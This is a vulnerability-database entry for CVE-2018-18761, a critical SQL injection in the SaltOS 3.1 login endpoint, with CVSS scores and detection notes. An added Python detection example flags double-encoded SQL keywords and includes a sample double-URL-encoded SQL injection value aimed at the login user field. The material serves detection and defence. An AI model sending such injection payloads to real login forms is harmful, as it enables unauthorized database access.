CVE-2018-18761
published 2018-11-16

CVE-2018-18761: SaltOS 3.1 r8126 allows action=login&querystring=&user=[SQL] SQL Injection.

Priority P268 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 16.46% (96.6th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
saltos | saltos | |

Detection & IOCs (extracted from sources)

url: /index.php
command: action=login&querystring=&user=[SQL]
  • Detect SQL injection attempts against SaltOS login endpoint: monitor POST requests to /index.php with body parameters action=login and a user field containing double-URL-encoded SQL payloads (e.g., %25 sequences).
  • The exploit uses double URL-encoding (e.g., %25 prefix) to bypass input filters; detection rules should decode at least two layers of percent-encoding before inspecting the user parameter for SQL keywords such as SELECT, FROM, WHERE, CONCAT, FLOOR, RAND.
  • The attack is delivered as a POST request with Content-Type: application/x-www-form-urlencoded and X-Requested-With: XMLHttpRequest header; alert on this combination targeting /index.php with action=login.
  • The SQL injection payload leverages an error-based/UNION technique querying information_schema.tables; monitor for the string 'information_schema' appearing (after decoding) in the user POST parameter.
  • The exploit targets a specific version; the PATH component in the URL is variable and must be adjusted to match the actual deployment path of SaltOS on the target server.
  • The vulnerable version is SaltOS 3.1 r8126; the exploit author notes it may also affect 3.x broadly, so detection should not be scoped only to r8126.
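
The detection notes above, combined into one check, as an added example that is not part of the original page or of SaltOS: it gates on the POST to /index.php with action=login, strips percent-encoding from the user field until the value is stable, and then looks for the listed SQL keywords. The function names, the severity rule, the /saltos/ path prefix and the sample request are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, unquote

# Keywords named in the detection notes; matched as whole words, case-insensitively.
SQL_TOKENS = re.compile(
    r"\b(select|from|where|concat|floor|rand|information_schema)\b", re.I)

def decode_layers(value, max_layers=4):
    """Percent-decode until the value stops changing; return (text, layers)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers

def inspect_login(method, path, headers, body):
    """Return a finding dict for a suspicious SaltOS login POST, else None."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST" or not path.split("?")[0].endswith("/index.php"):
        return None
    if not hdrs.get("content-type", "").lower().startswith(
            "application/x-www-form-urlencoded"):
        return None
    form = parse_qs(body, keep_blank_values=True)  # removes the first layer
    if form.get("action", [""])[0] != "login":
        return None
    user, extra = decode_layers(form.get("user", [""])[0])
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(user)})
    if not tokens:
        return None
    return {
        "extra_encoding_layers": extra,   # >= 1 means double-encoded or deeper
        "sql_tokens": tokens,
        "xhr": hdrs.get("x-requested-with", "").lower() == "xmlhttprequest",
        "severity": "high" if extra >= 1 or len(tokens) >= 2 else "low",
    }

# Constructed sample input (not taken from the page): a short SQL fragment,
# percent-encoded twice the way the notes describe.
FRAGMENT = "x' AND (SELECT 1 FROM information_schema.tables) AND 'a'='a"
SAMPLE_BODY = ("action=login&querystring=&user="
               + quote(quote(FRAGMENT, safe=""), safe="") + "&pass=x&lang=en_US")
SAMPLE_HEADERS = {"Content-Type": "application/x-www-form-urlencoded",
                  "X-Requested-With": "XMLHttpRequest"}

if __name__ == "__main__":
    print(inspect_login("POST", "/saltos/index.php", SAMPLE_HEADERS, SAMPLE_BODY))
```

Matching on the path suffix rather than a fixed prefix keeps the rule independent of where SaltOS is deployed, and nothing in the check is tied to r8126.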

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P